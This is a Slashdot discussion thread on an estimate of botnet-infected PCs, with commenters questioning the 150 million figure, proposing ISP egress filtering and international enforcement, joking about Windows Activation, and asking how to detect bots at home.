I was going to post something about imagining a Beowulf cluster of these or of welcoming our new botnet overlords, but the bot on my computer started threateNO CARRIER

Evidence? (1)

N7DR (536428) | more than 7 years ago | (#17777646)

I've seen this reported several times in the past few days. But nowhere have I seen any kind of explanation as to how he arrived at this number. Frankly, I find it unswallowable without some fairly convincing evidence. Maybe he has such evidence (I sure hope so), but if so, where is it?

Yes it is possible to eliminate (3, Interesting)

gurps_npc (621217) | more than 7 years ago | (#17777770)

The single reason why spam and other net abuses go on is that there is no world wide laws. It is a public crime, people can click on the spam and hunt down the person committing the crime simply by following the money. They getaway with it because If one country creates an effective law and enforces it, the spammers can just move to another country.

You want to cure it? Have ICAAN come up with a set of standard, simple guidelines. Not censorship, just simple things like "No sending out spam emails", "No Zombie Bot". Then have ICAAN rule that failure to pass laws enforcing these guidelines (individual countries get to decide what the actual law would be) or failure to cooperate to enforce them results in disconnect for that country from the rest of the internet. That would be ICAAN's sole enforement power

Give people a 3 month warning, then start disconnecting the countries that are the worst violators, giving the secondary violators another warning. In one month, if they pass new laws or fund new enforcements, they get a trial hook up again.

I predict one year of nastyness, during which all countries scramble to create and enforce real laws.

The worst of the worst of the offending countries, might split off and form a secondary, 'dangerous' internet. But who would care.

Would I trust this problem to law enforcement? No. (0)

Anonymous Coward | more than 7 years ago | (#17777774)

This is not the sort of issue I'd trust law enforcement to know how to deal with. This is a technical problem, and a technical, not social, solution is what is needed.

There are a variety of solutions available to us, actually:
1) Mac OS X - good for home users and multimedia creators/editors
2) OpenBSD - basically the most secure OS around
3) Linux - distributions like Ubuntu offer a great general-purpose desktop system
4) Solaris - more often used on servers, but also makes a great workstation OS
5) FreeBSD - a mix of the above: quality, usability, reliability, efficiency, security

The one thing people will point out as missing is a system for gaming. That's where Mac OS X comes in. As it becomes more popular, more game developers will realize that it's just the sort of system they wish to target. The fairly uniform hardware means it's a lot more like a typical console system, and thus far easier to develop for. Furthermore, Cocoa offers great multimedia features not found in other systems. It's essentially everything they could ask for.

Guns don't kills people... (0)

Anonymous Coward | more than 7 years ago | (#17777784)

POC

Go to tech store.
Buy Windows machine
Plug it into high-speed internet
Connect to internet
Leave machine running for some time
Check to see if it 0WN3D or zobmified
he he he
post back to slashdot
make a blog of it
get it sloshedated
profit

imho 50% more likely (0, Troll)

Qbertino (265505) | more than 7 years ago | (#17777914)

I'd say the real number is closer to 50%. Lot's of Bots out there that make an effort not to be noticed and just bog down the system. I hear from countless Windows users how slow their boxes are. I'd say it's a sure guess that at least 60% of those are compromised.

Re:imho 50% more likely (1)

geekoid (135745) | more than 7 years ago | (#17778166)

I'd say it's 100% of all computers because bots make themselves hard to find, therefore if you don't find one, there must be one there.

The ISPs could help stop this (4, Interesting)

vinn01 (178295) | more than 7 years ago | (#17777958)

I blame the ISPs for allowing traffic to leave their networks with spoofed IP addresses. That is - passing IP packets that are sourced within thier network with IP addresses that are not within their network.

Botnets spoof IP addresses to make if harder to track down the bots. But the IPS know where the bots are and could kill them, or filter them, if they had the testicles to do it. By pass the spoofed IP addressed traffic they make it harder for the rest of the world to filter the bots.

Botnets would be a heck of a lot easier to filter, and choke, if valid IP addresses were forced on all traffic.

I wonder how they got that 150M number? (4, Insightful)

Darth Muffin (781947) | more than 7 years ago | (#17778038)

I wonder how they got that 150M number--if it's the number of Bots out there or the number of infected PCs? If it's the former, and I suspect it is, you can't equate that to the number of PCs. One PC can be a member of several botnets. From what I've seen (and most of you have probably too), a PC either seems to be clean or has 14 bots and 95 pieces of spyware on it depending on the user's habits and training.

This will change with Vista (5, Insightful)

centron (61482) | more than 7 years ago | (#17778070)

After getting feedback that the majority of their users have Spyware installed on their systems, Microsoft decided to incorporate spyware directly into the OS (embrace and extend). With the release of Microsoft Vista, your computer will come with software that runs silently in the background, regularly checks in with their network, and can be completely disabled remotely, similar to botnet software produced by others.

While this system is not pre-configured to send spam or generate DDOS attacks like many other botnets, it does have the ability to download new functionality in the background through Windows Update, so this capability could be added at a later date if enough customers continue to install third party botnets. This means that while your Vista computer is already part of a botnet out of the box, it's fairly dormant. As an indication of the omnionous potential of this enhanced system, Microsoft is calling it 'Windows Activation'.

Riddle me this, botnet... (1)

geekoid (135745) | more than 7 years ago | (#17778132)

Let's say I sit down at a computer and I want to find out if it is being used as a botnet.
What is the best way to go about? monitor ports? is there a piece of software that can detect it for me? Perfeable something I can run anytime, but not have it loaded when I am not running it. I.E. not like antivirus software.

Ideally something whose utput isn't intemidating to a user that may need to read the resule back to me. I'm thinking family computers here.

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>